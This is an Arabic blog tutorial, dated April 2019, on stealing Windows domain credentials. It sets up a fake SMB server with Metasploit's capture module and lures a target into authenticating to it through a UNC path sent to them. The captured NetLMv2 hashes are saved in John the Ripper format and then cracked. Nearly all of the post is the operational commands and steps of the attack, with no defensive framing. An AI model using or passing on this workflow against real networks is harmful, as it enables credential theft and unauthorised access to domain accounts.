عمل خادم SMB مزيف لالتقاط كلمات مرور الخاصة بدومين

مواضيع مفضلة

الاثنين، 15 أبريل 2019

عمل خادم SMB مزيف لالتقاط كلمات مرور الخاصة بدومين

عمل خادم SMB مزيف لالتقاط كلمات مرور الخاصة بدومين

كيف نحصل على كلمات مرور الدومين دون مهاجمة وحدة تحكم الدومين المحصنة؟

واحدة من أكثر الميزات القوية المضمنة في Metasploit هي القدرة على إعداد خادم SMB مزيف. 

هذا يعني أنه عندما يحاول شخص ما على الشبكة الوصول إلى خادم SMB ، سيحتاج نظامه إلى تقديم بيانات اعتماده من حيث تجزئة كلمة مرور الدومين الخاصة به. في كثير من الأحيان ، يكون للشبكات الكبيرة نظام يتصل بشكل منهجي بكل جهاز للتحقق مما إذا كانت مصححة وآمنة. عندما تفعل ذلك ، يجب عليها تقديم بيانات اعتمادها إلى كل نظام ، وسوف يستخدم هذا عادةً كلمة مرور المسؤول. إذا كنا صبورًا ، فقد تكون هذه هي أفضل استراتيجية.

بالإضافة إلى ذلك ، من خلال إعداد خادم SMB المزيف هذا ، قد نتمكن من التقاط بيانات اعتماد الدومين عندما يحاول المستخدمون المصادقة authentication عليها. يمكننا إرسال الهدف إلى مسار UNC مضمن ، وعند النقر عليه ، يمكننا الحصول على بيانات اعتماد مجالهم.

على عكس بعض هجمات Metasploit الأخرى ، فإن هذا لا يمثل استغلالًا أو حمولة. إنها وحدة مساعدة ، وهي قادرة على التقاط التجزئة بتنسيق يمكن كسره باستخدام الادوات إما Cain و Abel أو John the Ripper.


الخطوة الاولى :- تشغيل الميتاسبلويت

لنبدا بفتح الاداة المفضلة الميتاسبلويت بكتابة 

عمل خادم SMB مزيف لالتقاط كلمات مرور الخاصة بدومين

الخطوة الثانية :- نقوم بإعداد خادم SMB

الآن بعد أن فتح Metasploit ، فلنقم بإعداد خادم SMB مزيف. على عكس بعض هجمات Metasploit الأخرى ، فإن هذا الهجوم ليس استغلالًا أو حمولة ، بل هو وحدة مساعدة. يمكننا تشغيله عن طريق كتابة

use auxiliary/server/capture/smb 

 عمل خادم SMB مزيف لالتقاط كلمات مرور الخاصة بدومين

الآن بعد أن قمنا بتحميل هذه الوحدة ، دعونا نلقي نظرة على الخيارات التي نحتاج إلى ضبطها لاستخدام هذه الوحدة.

show options 

عمل خادم SMB مزيف لالتقاط كلمات مرور الخاصة بدومين

كما ترى ، تحتوي هذه الوحدة على العديد من الخيارات ، لكن يمكننا ترك الإعدادات الافتراضية على كل منها ، باستثناء نوع الملف لتخزين التجزئة للتكسير.

لاحظ ، لقد أبرزت خيار JOHNPWFILE أعلاه. لدينا أيضا CAINPWFILE في القمة. تتيح لنا هذه الخيارات تحديد تنسيق الملف الذي يقوم بتخزين hashes للكراك بواسطة ادوات Cain و Abel أو John the Ripper. في هذا البرنامج التعليمي ، سأستخدم الأداة الأخيرة.

للقيام بذلك ، أريد ببساطة أن أخبر هذه الوحدة النمطية "بتعيين" JOHNPWFILE إلى موقع معين عن طريق كتابة:

set JOHNPWFILE /root/domainhashes 

الآن ، كل ما تبقى للقيام به هو كتابة

exploit 

عمل خادم SMB مزيف لالتقاط كلمات مرور الخاصة بدومين


عندما نكتب "exploit" ، ستبدأ هذه الوحدة في تشغيل خادم SMB مزيف يقوم بتخزين بيانات الاعتماد المقدمة في /root directory في الملفات التي تبدأ بـ "johnhashes".

الخطوة الثالثة :- share

الآن بعد أن تم تشغيل خادم SMB الخاص بنا ، نحتاج إلى شخص ما لمحاولة تسجيل الدخول إلى مشاركتنا. يمكننا القيام بذلك عن طريق إرسال رابط UNC لمشاركتنا ، مثل:

net use \\192.168.1.106 arab-cyber

عند النقر على هذا الرابط ، سيتم تقديم بيانات دومين الخاصة بهم إلى خادم SMB الخاص بنا والتقاطها كما في الصورة أدناه.

عمل خادم SMB مزيف لالتقاط كلمات مرور الخاصة بدومين 

الخطوة الرابعة :- Crack the Hash

الخطوة الأخيرة هي crack the hashes للحصول على كلمة المرور. نحن بحاجة للذهاب إلى /root directory للعثور على ملفات hash المحفوظة.

cd /root 
 عمل خادم SMB مزيف لالتقاط كلمات مرور الخاصة بدومين

كما ترون ، هناك نوعان من hashes المخزن هنا. الآن للقضاء عليهم ، يمكننا استخدام John the Ripper بكتابة: 


john johnhashes_netlmv2

عمل خادم SMB مزيف لالتقاط كلمات مرور الخاصة بدومين 

عندما نقوم بذلك ، يقوم John the Ripper بتحميل كلمة مرور hash ، والتعرف على نوع hash، ويبدأ في عمل كراك لها اي فكها.

إرسال تعليق

المشاركة على واتساب متوفرة فقط في الهواتف